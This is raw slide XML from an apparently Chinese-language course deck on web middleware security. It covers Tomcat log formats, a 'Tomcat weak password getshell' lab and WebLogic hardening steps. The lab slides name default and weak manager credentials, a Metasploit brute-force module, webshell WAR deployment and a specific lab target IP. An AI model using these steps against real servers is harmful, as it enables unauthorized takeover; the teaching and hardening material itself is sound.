                  <a:pt x="9542907" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2318385">
                <a:moveTo>
                  <a:pt x="9547669" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9524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4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2318385">
                <a:moveTo>
                  <a:pt x="9525" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2318385">
                <a:moveTo>
                  <a:pt x="9538144" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2318385">
                <a:moveTo>
                  <a:pt x="9547669" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2313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dirty="0"/>
              <a:t>日志格式与</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>相同：</a:t>
            </a:r>
            <a:endParaRPr sz="145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/>
              <a:t>（</a:t>
            </a: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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://tomcat.apache.org/tomcat-8.0-doc/config/valve.html#Access_Logging</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1012825" indent="-152400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1280"/>
              </a:spcBef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%h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访问的用户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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址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%l </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问逻辑用户名，通常返回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'-'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%u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访问验证用户名，通常返回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'-'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%t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访问日时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%r </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问的方式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(post</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>或者是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get)</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问的资源和使用的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http</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议版本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%s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访问返回的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http</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>状态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%b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访问资源返回的流量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1012825" indent="-152400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="*"/>
              <a:tabLst>
                <a:tab pos="1013460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%T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访问所使用的时间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="12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b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Graylog</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0"/>
              <a:t>日志安全</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="145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/>
              <a:t>日志管理日志管理工具：收集，解析，可视化</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"/>
              <a:t>，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05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/>
              <a:t>具有报警选项的可插入日志和事件分析服务</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"/>
              <a:t>器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614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-Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>弱口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>getshell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EC82BB-9410-8C46-9B81-D55D92610EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="156927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问题来源：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43000" y="2066340"/>
            <a:ext cx="10389286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tomcat5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默认有两个角色：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role1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。其中账号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both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role1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的默认密码都是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。不过不具备部署应用的权限，默认需要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manager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权限才能够直接部署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war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包；（备注：图片中的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admin admin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用户是后添加的）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tomcat6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默认没有配置任何用户以及角色，没办法用默认账号登录；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6" y="3666979"/>
            <a:ext cx="9681759" cy="22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4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614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-Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>弱口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>getshell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EC82BB-9410-8C46-9B81-D55D92610EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1569274"/>
            <a:ext cx="1011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如果想要登陆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manager/html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conf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下的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tomcat-users.xml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需要添加：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43000" y="2476067"/>
            <a:ext cx="103892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&lt;role rolename="tomcat-gui"/&gt;</a:t>
            </a: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&lt;role rolename="manager-gui"/&gt;</a:t>
            </a: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&lt;role rolename="manager-script"/&gt;</a:t>
            </a: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&lt;user username="tomcat" password="tomcat" roles="manager-gui"/&gt;</a:t>
            </a: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&lt;user username="admin" password="123456" roles="tomcat-gui,manager-gui,manager-script"/&gt;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674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614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-Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>弱口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>getshell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EC82BB-9410-8C46-9B81-D55D92610EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1569274"/>
            <a:ext cx="7391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然而光这样还是不够的，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manager/html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仍然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403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43000" y="2476067"/>
            <a:ext cx="1038928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You are not authorized to view this page.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By default the Manager is only accessible from a browser running on the same machine as Tomcat. If you wish to modify this restriction, you'll need to edit the Manager's context.xml file.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这是因为在高版本的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中，默认只允许本机地址进行登陆，这需要我们在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/usr/local/tomcat/webapps/manager/META-INF/context.xml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内，把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allow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属性改为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^.*$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这样，访问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端口的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manager/html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，我们就可以看到登陆认证的对话框了。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07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中间件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的分类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6"/>
            <a:ext cx="10236886" cy="432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zh-Hans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数据库中间件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Han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92150" lvl="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endParaRPr lang="en-US" altLang="zh-Han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zh-Hans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数据库中间件通常用来解决如下问题：</a:t>
            </a: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6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读写数据量大的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单表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读写数据量大的库</a:t>
            </a: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单台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数据量巨大的服务器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由于大量的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读写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en-US" altLang="zh-Hans" sz="160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速率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遇到瓶颈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1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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zh-Hans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常见提供的功能：</a:t>
            </a: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数据库分表、分库、读写分离等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans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Han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r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="24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AFD760B-948D-824A-B928-CDCD3CC1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28" y="4344886"/>
            <a:ext cx="5724008" cy="24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41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614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-Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>弱口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>getshell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43000" y="2476067"/>
            <a:ext cx="1038928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尝试爆破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弱口令，可以用网上的工具，或者直接使用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metasploit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里面的模块：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 auxiliary/scanner/http/tomcat_mgr_login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之后在后台的位置，部署一个包含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webshell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war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包即可。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靶机地址：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202.112.51.134:8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="6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95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2383" y="3811270"/>
            <a:ext cx="1499870" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1499870" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1499615" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499615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155700" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1155700" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1155192" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11551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4732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>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:endParaRPr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98820A7-4430-4343-8B15-6381A8A47F1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630194" y="1866381"/>
            <a:ext cx="10614453" cy="2411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D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebLogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是美国</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>公司出品的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，是用于开发、集成、部署和管理大型分布式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>应用、网络应用和数据库应用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>应用服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3D4046"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="3D4046"/>
              </a:buClr>
              <a:buSzTx/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3D4046"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="3D4046"/>
              </a:buClr>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>默认开放端口：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D4046"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="3D4046"/>
              </a:buClr>
              <a:buSzTx/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3D4046"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/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ECCB38B8-19BC-E647-9204-9E7E7635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78" y="3049349"/>
            <a:ext cx="6977290" cy="34625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2383" y="3811270"/>
            <a:ext cx="1499870" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1499870" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1499615" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499615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155700" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1155700" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1155192" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11551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4732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Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Weblogic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的安全设置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155191" y="1976627"/>
            <a:ext cx="9537700" cy="2463165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9537700" h="2463165">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9537192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9537192" y="2462783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="246278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0188" y="1972589"/>
            <a:ext cx="9547860" cy="2472055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9547860" h="2472054">
                <a:moveTo>
                  <a:pt x="9542907" y="2471737"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2471737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2471508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2470823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2469768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="2468448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2466975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462212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2462212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2466975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2466975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547428" y="2468448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9546755" y="2469768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9545701" y="2470823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9544367" y="2471508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="2471737"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="24720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2472054">
                <a:moveTo>
                  <a:pt x="95381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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2472054">
                <a:moveTo>
                  <a:pt x="9538144" y="2466975"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2462212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="2462212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2466975"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2472054">
                <a:moveTo>
                  <a:pt x="9547669" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9525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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2472054">
                <a:moveTo>
                  <a:pt x="9525" y="2466975"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2462212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2462212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2466975"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2472054">
                <a:moveTo>
                  <a:pt x="9538144" y="2466975"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2466975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2462212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2462212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2466975"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="2472054">
                <a:moveTo>
                  <a:pt x="9547669" y="2466975"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="2466975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="2462212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="2462212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="24669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639851" y="1458055"/>
            <a:ext cx="10485349" cy="2862322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R="6958330" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3422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pc="235" dirty="0"/>
              <a:t>以低权限用户运行</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="235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eb</a:t>
            </a:r>
            <a:r>
              <a:rPr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og</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ic</a:t>
            </a:r>
            <a:endParaRPr sz="1450">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="606425">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="994"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以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weblogic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12c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为例，执行如下命令：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="106362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# su -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root</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="106362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# groupadd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weblogic</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1063625" marR="4892040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# useradd -g weblogic weblogic -s /bin/bash  # chown -R weblogic:weblogic</a:t>
            </a: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/tmp/wls12120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R="7002780" algn="ctr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然后重新启动服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1063625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# su -</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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weblogic</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="106362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#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/tmp/wls12120/user_projects/domains/mydomain/startWebLogic.sh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2398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4732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Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Weblogic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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的安全设置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79" y="1305070"/>
            <a:ext cx="10125075" cy="81724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限制用户尝试登陆次数</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469265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选择左侧导航栏中的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安全领域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，选择右侧领域名称，再选择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用户封锁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，根据自身需求设置参数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160" y="2170176"/>
            <a:ext cx="9723120" cy="412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0" y="1431086"/>
            <a:ext cx="26367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更改控制台目录名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051" y="1705280"/>
            <a:ext cx="10104349" cy="76302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更改高级选项中的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控制台上下文路径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为一个特异的名字，以达到隐蔽的效果，修改后需重启生效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也可以直接取消掉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启用控制台</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="42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”，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这样就完全不能使用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console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了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7800" y="2749094"/>
            <a:ext cx="9192768" cy="3764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1430832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删除内置应用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5191" y="2278379"/>
            <a:ext cx="9537700" cy="1632585"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9537700" h="1632585">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9537192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9537192" y="1632204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="163220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188" y="2274138"/>
            <a:ext cx="9547860" cy="1640839"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9542907" y="1640751"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1640751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1640509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1639836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1638782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1637461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1635988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631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1635988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="1635988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547428" y="1637461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9546755" y="1638782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9545701" y="1639836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9544367" y="1640509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="1640751"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="164083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9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9538144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4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9538144" y="1635988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1635988"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9547669" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9524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4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9525" y="1635988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1635988"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9538144" y="1635988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1635988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1635988"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9547669" y="1635988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1635988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
